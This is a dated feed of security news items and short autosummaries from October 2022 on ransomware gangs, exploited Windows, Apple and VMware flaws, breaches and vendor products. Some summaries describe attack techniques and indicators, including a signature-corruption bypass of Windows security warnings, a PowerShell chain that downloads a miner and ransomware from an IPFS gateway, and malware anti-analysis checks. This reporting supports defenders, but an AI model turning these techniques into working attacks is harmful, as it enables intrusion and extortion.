                2022-10-24 https://securityaffairs.co/wordpress/137567/cyber-warfare-2/cuba-ransomware-cert-ua.html

                The Ukraine Computer Emergency Response Team (CERT-UA) warns of Cuba Ransomware attacks against critical networks in the country. The Ukraine Computer Emergency Response Team (CERT-UA) warns of potential Cuba Ransomware attacks against local critical infrastructure. On October 21, 2022, the Ukraine CERT-UA uncovered a phishing campaign impersonating the Press Service of the General Staff of […]

                The post Cuba ransomware affiliate targets Ukraine, CERT-UA warns appeared first on Security Affairs.


                Cisco warns of ISE vulnerability with no fixed release or workaround

                exploits
                2022-10-24 https://www.malwarebytes.com/blog/news/2022/10/cisco-patch-needed-for-remote-file-access-vulnerability-in-identity-services-engine

                Categories: Exploits and vulnerabilities, News

                Tags: Cisco, Identity Services Engine, AnyConnect VPN server, CVE-2022-20822, CVE-2022-20959, CVE-2022-20933, input validation

                Cisco's latest security advisory includes a vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) that could allow an attacker to read and delete files.

                The post Cisco warns of ISE vulnerability with no fixed release or workaround appeared first on Malwarebytes Labs.

                Autosummary: The CVE-2022-20959 vulnerability in the External RESTful Services (ERS) API of Cisco Identity Services Engine (ISE) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device.


                Apple fixed the ninth actively exploited zero-day this year

                exploits
                2022-10-24 https://securityaffairs.co/wordpress/137579/security/apple-fixes-ninth-zero-day.html

                Apple released security updates that addressed the ninth zero-day vulnerability actively exploited in the wild since the start of the year. Apple has addressed the ninth zero-day vulnerability exploited in attacks in the wild since the start of the year. The vulnerability, tracked as CVE-2022-42827, is an out-of-bounds write issue that can be exploited by an attacker to […]

                The post Apple fixed the ninth actively exploited zero-day this year appeared first on Security Affairs.


                New Relic’s Vulnerability Management provides visibility across the entire software stack

                exploits
                2022-10-23 https://www.helpnetsecurity.com/2022/10/23/new-relic-vulnerability-management/

                New Relic has introduced the public preview of New Relic Vulnerability Management to empower organizations to manage their security posture and risk as a core part of their observability strategy. This new offering helps engineering teams eliminate data and team silos that can cause security blind spots, slow mitigation times, and lower innovation velocity. With Vulnerability Management, all native and external security data is available in a single platform to give engineers instant visibility and … More

                The post New Relic’s Vulnerability Management provides visibility across the entire software stack appeared first on Help Net Security.

                Autosummary: Vulnerability Management is currently available in public preview as part of the New Relic platform—the all-in-one observability platform with a secure telemetry cloud for all telemetry metrics, events, logs, and traces, full-stack analysis tools, and predictable usage-based pricing instead of disjointed SKU bundles.


                Week in review: CISA releases RedEye, Apache Commons Text flaw, Medibank data breach

                financial
                2022-10-23 https://www.helpnetsecurity.com/2022/10/23/week-in-review-cisa-releases-redeye-apache-commons-text-flaw-medibank-data-breach/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Medibank hack turned into a data breach: The attackers are demanding money Medibank, Australia’s largest private health provider, has confirmed that last week’s “cyber incident” has resulted in a data breach. CISA releases RedEye open-source analytic tool CISA has released RedEye, an interactive open-source analytic tool to visualize and report Red Team command and control activities. iDealwine suffers a data … More

                The post Week in review: CISA releases RedEye, Apache Commons Text flaw, Medibank data breach appeared first on Help Net Security.

                Autosummary: New infosec products of the week: October 21, 2022 Here’s a look at the most interesting products from the past week, featuring releases from AwareGO, Code42, Corelight, EnigmaSoft, Exabeam, Mandiant, and RSA. Being technical is just one of the requirements In this Help Net Security interview, Chris Konrad, Area Vice President of Security, Global Accounts at World Wide Technology, offers advice to CISOs that are increasingly under pressure, discusses using a security maturity model, discusses interesting security technologies, and more. 3 mistakes organizations make when trying to manage data securely In this Help Net Security video, Nong Li, CEO at Okera, provides tips to avoid what he considers the top three mistakes organizations make when trying to manage data securely: data preparation, access & governance, and de-identification.


                Thousands of GitHub repositories deliver fake PoC exploits with malware

                exploits
                2022-10-23 https://www.bleepingcomputer.com/news/security/thousands-of-github-repositories-deliver-fake-poc-exploits-with-malware/
                Researchers at the Leiden Institute of Advanced Computer Science found thousands of repositories on GitHub that offer fake proof-of-concept (PoC) exploits for various vulnerabilities, some of them including malware. [...]

                Autosummary: [Image: Fake PoC exfiltration example (Arxiv.org)] One of the researchers, El Yadmani Soufian, who is also a security researcher at Darktrace, was kind enough to provide BleepingComputer with additional examples not included in the technical report, which are given below: a PowerShell PoC containing a binary encoded in base64, flagged as malicious in VirusTotal. [Image: Obfuscated script and de-obfuscated Houdini] In another case, the researchers spotted a fake PoC that was an info-stealer collecting system information, IP address, and user agent.


                Typosquat campaign mimics 27 brands to push Windows, Android malware

                exploits industry
                2022-10-23 https://www.bleepingcomputer.com/news/security/typosquat-campaign-mimics-27-brands-to-push-windows-android-malware/
                A massive, malicious campaign is underway using over 200 typosquatting domains that impersonate twenty-seven brands to trick visitors into downloading various Windows and Android malware. [...]

                Autosummary: [Image: Malicious site impersonating PayPal] Some of the domains used for this purpose are: payce-google[.]com (impersonates Google Wallet), snanpckat-apk[.]com (impersonates Snapchat), vidmates-app[.]com (impersonates VidMate), paltpal-apk[.]com (impersonates PayPal), m-apkpures[.]com (impersonates APKPure), and tlktok-apk[.]link (impersonates the download portal for the TikTok app). In all these cases, the malware delivered to users attempting to download the APKs is ERMAC, a banking trojan targeting banking accounts and cryptocurrency wallets from 467 apps.


                Wholesale giant METRO confirmed to have suffered a cyberattack

                ciber
                2022-10-23 https://securityaffairs.co/wordpress/137506/hacking/metro-confirmed-cyberattack.html

                International cash and carry giant METRO suffered IT infrastructure outages this week following a cyberattack. International cash and carry giant METRO was hit by a cyberattack that caused IT infrastructure outages. Metro employs more than 95,000 people in 681 stores worldwide, most of them in Germany; its sales reached 24.8 billion euros in 2020. The […]

                The post Wholesale giant METRO confirmed to have suffered a cyberattack appeared first on Security Affairs.


                Hackers stole sensitive data from Iran’s atomic energy agency

                industry
                2022-10-23 https://securityaffairs.co/wordpress/137513/hacking/hackers-stole-sensitive-data-from-irans-atomic-energy-agency.html

                Iran’s atomic energy agency claims that alleged state-sponsored hackers have compromised its email system. Iran’s atomic energy agency revealed on Sunday that a nation-state actor had access to a subsidiary’s network and free access to its email system, the Associated Press reports. The Iranian government has yet to attribute the attack to a specific The […]

                The post Hackers stole sensitive data from Iran’s atomic energy agency appeared first on Security Affairs.

                Autosummary: The Iranian government has yet to attribute the attack to a specific The hacker group, which calls itself Black Reward, announced the hack of the Atomic Energy Organization on Telegram and shared files of contracts, construction plans, and details about equipment at the Bushehr plant as proof of the intrusion.


                Trilio’s Continuous Restore enables users to stage data in multiple heterogeneous clouds

                ransomware
                2022-10-22 https://www.helpnetsecurity.com/2022/10/22/continuous-restore-trilio/

                Trilio’s Continuous Restore offers faster levels of replication, restoration and migration of Kubernetes data and metadata from any cloud or storage platform to another, providing near-instantaneous recovery times for cloud-native applications. Entirely distribution-, cloud- and storage-agnostic, Trilio’s Continuous Restore enables users to continuously stage data in multiple heterogeneous clouds. This means that applications—regardless of where they reside—can tap into that data and be brought online in seconds, achieving exceptional levels of Recovery Time Objectives (RTO). … More

                The post Trilio’s Continuous Restore enables users to stage data in multiple heterogeneous clouds appeared first on Help Net Security.

                Autosummary: “Trilio’s Continuous Restore capability is a revolution in data protection because it moves the industry beyond ‘back-up your data anywhere, anytime’ to ‘your data is available everywhere, all the time,’” said David Safaii, CEO of Trilio. “Trilio’s Continuous Restore capability enables migration and replication of stateful applications in seconds or minutes so that all companies can protect and use their data anywhere, from core to edge—regardless of what the application runs on or where the data is stored,” said Murali Balcha, founder and CTO of Trilio.


                TommyLeaks and SchoolBoys: Two sides of the same ransomware gang

                exploits ransomware
                2022-10-22 https://www.bleepingcomputer.com/news/security/tommyleaks-and-schoolboys-two-sides-of-the-same-ransomware-gang/
                Two new extortion gangs named "TommyLeaks" and "SchoolBoys" are targeting companies worldwide. However, there is a catch — they are both the same ransomware gang. [...]

                Autosummary: [Image: SchoolBoy's Ransomware Gang negotiation site (Source: BleepingComputer.com)] [Image: TommyLeaks negotiation site (Source: BleepingComputer.com)] Even more curious, this same chat system has only been used before by the Karakurt extortion group.


                Exploited Windows zero-day lets JavaScript files bypass security warnings

                exploits
                2022-10-22 https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/
                A new Windows zero-day allows threat actors to use malicious JavaScript files to bypass Mark-of-the-Web security warnings. Threat actors are already seen using the zero-day bug in ransomware attacks. [...]

                Autosummary: Tweet by Will Dormann (@wdormann), October 18, 2022: "Signed calcxp.exe - (Checked w/ SmartScreen) Modified a byte in sig - (No SmartScreen check) pic.twitter.com/4WwdDBpU0a". Once the signature is corrupted, Windows will not check the file using SmartScreen, as if a MoTW flag was not present, and allow it to run. [Image: Malformed signature in malicious JavaScript file (Source: BleepingComputer)] When signed in this manner, even though the JS file was downloaded from the Internet and received a MoTW flag, Microsoft would not display the security warning, and the script would automatically execute to install the Magniber ransomware. Both of these JavaScript (.JS) files were shared with BleepingComputer, and as you can see below, they both received a Mark-of-the-Web, as indicated by the red boxes, when downloaded from a website.


                Threat actors exploit critical flaw in VMware Workspace ONE Access to drop ransomware, miners

                exploits ransomware
                2022-10-22 https://securityaffairs.co/wordpress/137483/hacking/vmware-workspace-one-access-flaw.html

                Threat actors are exploiting a now-patched vulnerability, tracked as CVE-2022-22954, in VMware Workspace ONE Access in attacks in the wild. Threat actors are actively exploiting a now-patched vulnerability, tracked as CVE-2022-22954, in VMware Workspace ONE Access to deliver cryptocurrency miners and ransomware. The issue causes server-side template injection due to the lack of […]

                The post Threat actors exploit critical flaw in VMware Workspace ONE Access to drop ransomware, miners appeared first on Security Affairs.

                Autosummary: Threat actors are actively exploiting a now-patched vulnerability, tracked as CVE-2022-22954, in VMware Workspace ONE Access to deliver cryptocurrency miners and ransomware.


                Daixin Team targets health organizations with ransomware, US agencies warn

                exploits ransomware
                2022-10-22 https://securityaffairs.co/wordpress/137493/cyber-crime/daixin-team-targets-healthcare.html

                US government agencies warned that the Daixin Team cybercrime group is actively targeting the U.S. Healthcare and Public Health sector with ransomware. CISA, the FBI, and the Department of Health and Human Services (HHS) warned that the Daixin Team cybercrime group is actively targeting U.S. businesses, mainly in the Healthcare and Public Health (HPH) Sector, […]

                The post Daixin Team targets health organizations with ransomware, US agencies warn appeared first on Security Affairs.

                Autosummary: In addition, the FBI, CISA, and HHS urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents. CISA, the FBI, and the Department of Health and Human Services (HHS) warned that the Daixin Team cybercrime group is actively targeting U.S. businesses, mainly in the Healthcare and Public Health (HPH) Sector, with ransomware operations.


                Student Freedom Initiative and Cisco partnership supports cybersecurity infrastructure at HBCUs

                ciber
                2022-10-22 https://www.helpnetsecurity.com/2022/10/23/student-freedom-initiative-cisco/

                Student Freedom Initiative and Cisco have expanded their partnership to bolster cybersecurity infrastructure at Historically Black Colleges and Universities (HBCUs) by adding three prominent Certified Minority Business Enterprises (MBEs)—Procellis Technology, Sology Solutions, and IPC Consulting—to the cybersecurity implementation team. This collaboration is a direct actionable response to the Department of Education/Federal Student Aid (FSA) guidance promulgated on December 18, 2020 for colleges and universities to comply with National Institute of Standards and Technology (NIST) 800 … More

                The post Student Freedom Initiative and Cisco partnership supports cybersecurity infrastructure at HBCUs appeared first on Help Net Security.

                Autosummary: “Over the last two years, we’ve made steady progress building scalable systems, processes, governance and technology, and establishing strategic partnerships to increase the resilience of our institutions and the global competitiveness of our students,” said Mark Brown, Executive Director of Student Freedom Initiative.


                How phishing campaigns abuse Google Ad click tracking redirects

                financial
                2022-10-21 https://www.helpnetsecurity.com/2022/10/21/how-phishing-campaigns-abuse-google-ad-click-tracking-redirects-video/

                PhishLabs by HelpSystems has identified attackers leveraging a weakness in Google’s ad service to carry out phishing campaigns on financial institutions. In this Help Net Security video, Kevin Cryan, Director of Operational Intelligence at PhishLabs, talks about how this type of attack is different from the one identified by Microsoft – threat actors use conditional geolocation logic to present the legitimate landing page when Google scans their ad. Google publishes the ad and displays the … More

                The post How phishing campaigns abuse Google Ad click tracking redirects appeared first on Help Net Security.


                Presidio Active Response Solution Set strengthens ransomware preparedness for businesses

                exploits ransomware
                2022-10-21 https://www.helpnetsecurity.com/2022/10/21/presidio-active-response-solution-set/

                To further address the increasing cybersecurity threat landscape, Presidio has revealed a new cybersecurity Active Response Solution Set to help clients be prepared for a ransomware event with assessments, preparedness, active response, and recovery. Ransomware is one of the largest global industries. According to IDC, 37% of global organizations were impacted by some form of ransomware in 2021. Presidio is addressing organizational needs for cyber insurance by meeting stringent minimum compliance requirements in order to … More

                The post Presidio Active Response Solution Set strengthens ransomware preparedness for businesses appeared first on Help Net Security.

                Autosummary: “Presidio’s Active Response Solution Set slices through a fragmented approach to cyber defense by joining all aspects into one simple solution,” said Sunil Jain, CEO at Marius, a cyber insurance group partnering with cybersecurity providers to streamline cyber insurance for their clients.


                MetricStream Euphrates enables enterprises to improve their GRC program performance

                industry
                2022-10-21 https://www.helpnetsecurity.com/2022/10/21/metricstream-euphrates/

                MetricStream has unveiled its latest product release, focused on accelerating GRC program performance. The purpose-built low-code/no-code platform empowers customers to easily personalize and configure products to their needs. New APIs help connect MetricStream with external systems and enrich GRC insights to accelerate decision making. “Today’s CXOs are under heavy pressure to balance a plethora of threats, ensure business resilience, and reduce costs,” said Prasad Sabbineni, Co-CEO, MetricStream. “It’s our belief that we can help them … More

                The post MetricStream Euphrates enables enterprises to improve their GRC program performance appeared first on Help Net Security.



                News URSNIF variant doesn’t support banking features

                financial
                2022-10-21 https://securityaffairs.co/wordpress/137435/malware/ursnif-shift-backdoor.html

                A new variant of the popular Ursnif malware is used as a backdoor to deliver next-stage payloads and steal sensitive data. Mandiant researchers warn of a significant shift from Ursnif’s original purpose: the malware, initially used in banking fraud, is now used to deliver next-stage payloads and steal sensitive data. The new variant, first observed […]

                The post News URSNIF variant doesn’t support banking features appeared first on Security Affairs.

                Autosummary: “The LOAD_DLL command thus allows for a simpler, more generic way of providing a plugin-like feature by extending the features of the malware via arbitrary DLL modules (in contrast to regular plugin DLLs, which must be implemented in a specific way to work with the main malware),” the report continues.


                Healthcare system Advocate Aurora Health data breach potentially impacted 3M patients

                financial
                2022-10-21 https://securityaffairs.co/wordpress/137421/data-breach/advocate-aurora-health-data-breach.html

                Healthcare system Advocate Aurora Health (AAH) disclosed a data breach that exposed the personal data of 3,000,000 patients. The US-based hospital healthcare system Advocate Aurora Health (AAH) disclosed a data breach that exposed the personal data of 3,000,000 patients. The company is notifying the impacted individuals. The healthcare system operates 26 hospitals in Wisconsin and […]

                The post Healthcare system Advocate Aurora Health data breach potentially impacted 3M patients appeared first on Security Affairs.

                Autosummary: Exposed patients’ data includes:

                • IP address
                • Dates, times, and locations of scheduled appointments
                • Proximity to an AAH location
                • Medical provider information
                • Type of appointment or procedure
                • Communications between MyChart users, which may have included first and last names and medical record numbers
                • Insurance information
                • Proxy account information

                Privacy experts pointed out that the Meta Pixel code, which is also used by many other hospitals, sends sensitive data to Meta, which uses it for marketing purposes.


                Medibank hack turned into a data breach: The attackers are demanding money

                financial
                2022-10-21 https://www.helpnetsecurity.com/2022/10/21/medibank-hack-data-breach/

                Medibank, Australia’s largest private health provider, has confirmed that last week’s “cyber incident” has resulted in a data breach. “Medibank has been contacted by a criminal claiming to have stolen 200GB of data,” the company said. “The criminal has provided a sample of records for 100 policies which we believe has come from our ahm and international student systems.” The extent of the Medibank data breach The attack on Medibank was spotted on October 12, … More

                The post Medibank hack turned into a data breach: The attackers are demanding money appeared first on Help Net Security.

                Autosummary: “That data includes first names and surnames, addresses, dates of birth, Medicare numbers, policy numbers, phone numbers and some claims data.”


                Hackers Started Exploiting Critical "Text4Shell" Apache Commons Text Vulnerability

                exploits
                2022-10-21 https://thehackernews.com/2022/10/hackers-started-exploiting-critical.html
                WordPress security company Wordfence on Thursday said it started detecting exploitation attempts targeting the newly disclosed flaw in Apache Commons Text on October 18, 2022. The vulnerability, tracked as CVE-2022-42889 aka Text4Shell, has been assigned a severity ranking of 9.8 out of a possible 10.0 on the CVSS scale and affects versions 1.5 through 1.9 of the library. It’s also similar to


                A Quick Look at the “Strengthening America’s Cybersecurity” Initiative

                ciber
                2022-10-21 https://thehackernews.com/2022/10/a-quick-look-at-strengthening-americas.html
                Acknowledging that you have a problem is the first step to addressing the problem in a serious way. This seems to be the reasoning for the White House recently announcing its “Strengthening America’s Cybersecurity” initiative. The text of the announcement contains several statements that anyone who’s ever read about cybersecurity will have heard many times over: increasing resilience, greater

                Autosummary: Nonetheless, sharing information about threat actors, methodologies, and novel techniques is undoubtedly in everyone’s best interest and, if set in motion adequately, will enable faster responses to new threats. Also, without adequate international support, the labeling initiative will probably lead to fragmentation, just like GDPR did – as some websites now choose to simply block off all visitors from GDPR-covered regions rather than try to comply with GDPR requirements.


                BlackByte ransomware uses new data theft tool for double-extortion

                exploits ransomware
                2022-10-21 https://www.bleepingcomputer.com/news/security/blackbyte-ransomware-uses-new-data-theft-tool-for-double-extortion/
                A BlackByte ransomware affiliate is using a new custom data stealing tool called "ExByte" to steal data from compromised Windows devices quickly. [...]

                Autosummary: Also, the malware checks for the presence of the following DLL files: avghooka.dll, avghookx.dll, sxin.dll, sf2.dll, sbiedll.dll, snxhk.dll, cmdvrt32.dll, cmdvrt64.dll, wpespy.dll, vmcheck.dll, pstorec.dll, dir_watch.dll, api_log.dll, dbghelp.dll. The BlackByte ransomware binary also implements these same tests, but the exfiltration tool needs to run them independently since data exfiltration takes place before file encryption.


                Multiple Campaigns Exploit VMware Vulnerability to Deploy Crypto Miners and Ransomware

                exploits ransomware
                2022-10-21 https://thehackernews.com/2022/10/multiple-campaigns-exploit-vmware.html
                A now-patched vulnerability in VMware Workspace ONE Access has been observed being exploited to deliver both cryptocurrency miners and ransomware on affected machines. "The attacker intends to utilize a victim’s resources as much as possible, not only to install RAR1Ransom for extortion, but also to spread GuardMiner to collect cryptocurrency," Fortinet FortiGuard Labs researcher Cara Lin said


                CISA adds Linux kernel flaw CVE-2021-3493 to its Known Exploited Vulnerabilities Catalog

                exploits
                2022-10-21 https://securityaffairs.co/wordpress/137454/security/cve-2021-3493-known-exploited-vulnerabilities-catalog.html

                CISA added a Linux kernel vulnerability, tracked as CVE-2021-3493, to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week added a Linux kernel vulnerability, tracked as CVE-2021-3493, to its Known Exploited Vulnerabilities Catalog. According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the […]

                The post CISA adds Linux kernel flaw CVE-2021-3493 to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.



                US govt warns of Daixin Team targeting health orgs with ransomware

                exploits ransomware
                2022-10-21 https://www.bleepingcomputer.com/news/security/us-govt-warns-of-daixin-team-targeting-health-orgs-with-ransomware/
                CISA, the FBI, and the Department of Health and Human Services (HHS) warned that a cybercrime group known as Daixin Team is actively targeting the U.S. Healthcare and Public Health (HPH) Sector in ransomware attacks. [...]

                Autosummary: “This third-party reporting as well as FBI analysis show that the ransomware targets ESXi servers and encrypts files located in /vmfs/volumes/ with the following extensions: .vmdk, .vmem, .vswp, .vmsd, .vmx, and .vmsn.”


                Wholesale giant METRO hit by IT outage after cyberattack

                ciber
                2022-10-21 https://www.bleepingcomputer.com/news/security/wholesale-giant-metro-hit-by-it-outage-after-cyberattack/
                International wholesale giant METRO is experiencing infrastructure outages and store payment issues following a recent cyberattack. [...]

                Autosummary: METRO store notification regarding IT issues (Günter Born)

                METRO is an international wholesale company for customers in the HoReCa (hotel, restaurants, and catering) industry, operating in over 30 countries and employing more than 95,000 people worldwide.


                Hackers exploit critical VMware flaw to drop ransomware, miners

                exploits ransomware
                2022-10-21 https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-vmware-flaw-to-drop-ransomware-miners/
                Security researchers observed malicious campaigns leveraging a critical vulnerability in VMware Workspace One Access to deliver various malware, including the RAR1Ransom tool that locks files in password-protected archives. [...]

                Autosummary: The PowerShell script ("init.ps1") downloads the following files from a Cloudflare IPFS gateway:

                • phpupdate.exe: Xmrig Monero mining software
                • config.json: Configuration file for mining pools
                • networkmanager.exe: Executable used to scan and spread infection
                • phpguard.exe: Executable used as a guardian to keep the Xmrig miner running
                • clean.bat: Script file to remove other cryptominers on the compromised host
                • encrypt.exe: RAR1 ransomware

                If the Cloudflare resource is unavailable for any reason, the malware uses a backup link at "crustwebsites[.]net".


                AA22-294A: #StopRansomware: Daixin Team

                exploits
                2022-10-21 https://us-cert.cisa.gov/ncas/alerts/aa22-294a
                Original release date: October 21, 2022

                Summary

                Actions to take today to mitigate cyber threats from ransomware:

                • Install updates for operating systems, software, and firmware as soon as they are released.
                • Require phishing-resistant MFA for as many services as possible.
                • Train users to recognize and report phishing attempts.

                Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

                The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Department of Health and Human Services (HHS) are releasing this joint CSA to provide information on the “Daixin Team,” a cybercrime group that is actively targeting U.S. businesses, predominantly in the Healthcare and Public Health (HPH) Sector, with ransomware and data extortion operations.

                This joint CSA provides TTPs and IOCs of Daixin actors obtained from FBI threat response activities and third-party reporting.

                Download the PDF version of this report: pdf, 591 KB

                Technical Details

                Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 11. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.

                Autosummary: Table 2: Daixin Team IOCs – Rclone Associated SHA256 Hashes

                File | SHA256
                rclone-v1.59.2-windows-amd64\git-log.txt | 9E42E07073E03BDEA4CD978D9E7B44A9574972818593306BE1F3DCFDEE722238
                rclone-v1.59.2-windows-amd64\rclone.1 | 19ED36F063221E161D740651E6578D50E0D3CACEE89D27A6EBED4AB4272585BD
                rclone-v1.59.2-windows-amd64\rclone.exe | 54E3B5A2521A84741DC15810E6FED9D739EB8083CB1FE097CB98B345AF24E939
                rclone-v1.59.2-windows-amd64\README.html | EC16E2DE3A55772F5DFAC8BF8F5A365600FAD40A244A574CBAB987515AA40CBF
                rclone-v1.59.2-windows-amd64\README.txt | 475D6E80CF4EF70926A65DF5551F59E35B71A0E92F0FE4DD28559A9DEBA60C28

                Mitigations: FBI, CISA, and HHS urge HPH Sector organizations to implement the following to protect against Daixin and related malicious activity: Install updates for operating systems, software, and firmware as soon as they are released.

                Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.

                Since then, Daixin Team cybercrime actors have caused ransomware incidents at multiple HPH Sector organizations where they have:

                • Deployed ransomware to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services, and/or
                • Exfiltrated personal identifiable information (PII) and patient health information (PHI) and threatened to release the information if a ransom is not paid.

                In addition, the FBI, CISA, and HHS urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.

                the HHS 405(d) Aligning Health Care Industry Security Approaches at 405d.hhs.gov

                Reporting: The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Daixin Group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

                This third-party reporting as well as FBI analysis show that the ransomware targets ESXi servers and encrypts files located in /vmfs/volumes/ with the following extensions: .vmdk, .vmem, .vswp, .vmsd, .vmx, and .vmsn.

                See CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide and CISA Fact Sheet, Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches, for information on creating a ransomware response checklist and planning and responding to ransomware-caused data breaches.


                Emotet Botnet Distributing Self-Unlocking Password-Protected RAR Files to Drop Malware

                exploits
                2022-10-21 https://thehackernews.com/2022/10/emotet-botnet-distributing-self.html
                The notorious Emotet botnet has been linked to a new wave of malspam campaigns that take advantage of password-protected archive files to drop CoinMiner and Quasar RAT on compromised systems. In an attack chain detected by Trustwave SpiderLabs researchers, an invoice-themed ZIP file lure was found to contain a nested self-extracting (SFX) archive, the first archive acting as a conduit to launch


                The Week in Ransomware - October 21st 2022 - Stop the Presses

                exploits ransomware
                2022-10-21 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-21st-2022-stop-the-presses/
                Cybersecurity researchers did not disappoint, with reports linking RansomCartel to REvil, on OldGremlin hackers targeting Russia with ransomware, a new data exfiltration tool used by BlackByte, a warning that ransomware actors are exploiting VMware vulnerabilities, and finally, our own report on the Venus Ransomware. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @malwrhunterteam, @PolarToffee, @Ionut_Ilascu, @FourOctets, @jorntvdw, @struppigel, @BleepinComputer, @demonslay335, @billtoulas, @Seifreed, @LawrenceAbrams, @serghei, @fwosar, @DanielGallagher, @VK_Intel, @malwareforme, @Fortinet, @BroadcomSW, @0verfl0w_, @linuxct, @Unit42_Intel, @Amermelsad, @MsftSecIntel, @CrowdStrike, @GroupIB_GIB, @BushidoToken, @JackRhysider, @Intel471Inc, @NCCGroupplc, and @pcrisk.


                Looking for student debt relief? Watch out for scammers says the FBI

                financial
                2022-10-21 https://www.malwarebytes.com/blog/news/2022/10/psa-scammers-likely-to-target-student-loan-relief-applicants

                Categories: News

                Categories: Scams

                Tags: One-Time Federal Student Loan Debt Relief

                Tags: FBI

                Tags: student loan relief scam

                The FBI has warned that scammers are likely to target people looking for student loan relief now that applications have opened.

                The post Looking for student debt relief? Watch out for scammers says the FBI appeared first on Malwarebytes Labs.



                EnergyAustralia Electricity company discloses security breach

                government industry
                2022-10-21 https://securityaffairs.co/wordpress/137473/data-breach/energyaustralia-data-breach.html

                Electricity company EnergyAustralia suffered a security breach, threat actors had access to information on 323 customers. Another Australian organization was hit by a severe cyber attack, this time the victim is the Electricity company EnergyAustralia. EnergyAustralia is the country’s third-largest energy retailer. The company confirmed that threat actors had access to information on 323 residential and […]

                The post EnergyAustralia Electricity company discloses security breach appeared first on Security Affairs.

                Autosummary: According to a statement released on Friday, the compromised data were stored on the company’s online platform, My Account, and included customer names, addresses, email addresses, electricity and gas bills, phone numbers, and the first six and last three digits of their credit cards.


                Experts warn of CVE-2022-42889 Text4Shell exploit attempts

                exploits
                2022-10-21 https://securityaffairs.co/wordpress/137462/hacking/text4shell-exploitation-attempts.html

                Wordfence researchers warn of exploitation attempts targeting the recently disclosed flaw in Apache Commons Text dubbed Text4Shell. Experts at WordPress security firm Wordfence reported exploitation attempts targeting the recently disclosed flaw in Apache Commons Text dubbed Text4Shell. GitHub’s threat analyst Alvaro Munoz this week disclosed a remote code execution vulnerability, tracked as CVE-2022-42889 (CVSS score 9.8), in the open-source Apache Commons […]

                The post Experts warn of CVE-2022-42889 Text4Shell exploit attempts appeared first on Security Affairs.



                APT‑C‑50 updates FurBall Android malware – Week in security with Tony Anscombe

                exploits
                2022-10-21 https://www.welivesecurity.com/videos/apt-c-50-updates-furball-android-malware-week-security-tony-anscombe/

                ESET Research spots a new version of Android malware known as FurBall that APT-C-50 is using in its wider Domestic Kitten campaign

                The post APT‑C‑50 updates FurBall Android malware – Week in security with Tony Anscombe appeared first on WeLiveSecurity



                Open banking API security: Best practices to ensure a safe journey

                financial
                2022-10-20 https://www.helpnetsecurity.com/2022/10/20/open-banking-api-security-best-practices/

                More than 9 in 10 financial sectors accept that open banking is vital to their organization. The demand for fast, hassle-free, and personalized banking and financial services among customers is driving the rapid adoption of open banking. However, nearly 50% of banking customers fear the security of open banking. For open banking to function, APIs are critical as they help create connectivity between different stakeholders for the transfer of financial data. Banks and financial institutions … More

                The post Open banking API security: Best practices to ensure a safe journey appeared first on Help Net Security.

                Autosummary: Other API protection best practices: check and track compliance; minimize false positives; don’t forget logging and monitoring. The way forward: While fuelling innovation and reshaping customer experiences in the banking and financial service industry, open banking APIs also increase security challenges and risks. To this end, you must leverage an intelligent and fully managed API security solution that combines CDN, advanced DDoS prevention, malicious bot mitigation, WAF, malware protection, and so on.


                Ransomware preparedness: What are you doing wrong?

                exploits
                2022-10-20 https://www.helpnetsecurity.com/2022/10/20/insufficient-ransomware-preparedness/

                Axio released its 2022 State of Ransomware Preparedness research report, revealing that although notable improvements have been made since Axio’s 2021 report, organizational ransomware preparedness continues to be insufficient to keep pace with new attack vectors. The report reveals that the lack of fundamental cybersecurity practices and controls, including critical vulnerability patching and employee cybersecurity training, continues to undermine organizational attempts to improve ransomware defenses. “Ransomware continues to wreak havoc on global organizations, regardless of … More

                The post Ransomware preparedness: What are you doing wrong? appeared first on Help Net Security.



                EnigmaSoft SpyHunter Pro combines anti-malware detection and blocking to enhance privacy protection

                exploits
                2022-10-20 https://www.helpnetsecurity.com/2022/10/20/enigmasoft-spyhunter-pro/

                EnigmaSoft Limited is offering SpyHunter Pro, a brand new enhanced, and feature-packed premium anti-malware product that builds on EnigmaSoft’s expertise in cyber security and developing anti-malware products. SpyHunter Pro is a Windows anti-malware application that combines SpyHunter’s effective system guards to help block malware before they cause damage, plus anti-malware detection and removal algorithms, along with new premium features, including functionality purposely designed to enhance privacy protection and optimize computers. SpyHunter Pro also includes, at … More

                The post EnigmaSoft SpyHunter Pro combines anti-malware detection and blocking to enhance privacy protection appeared first on Help Net Security.



                Sophos expands its MDR offering to include compatibility with third-party cybersecurity products

                ciber
                2022-10-20 https://www.helpnetsecurity.com/2022/10/20/sophos-mdr/

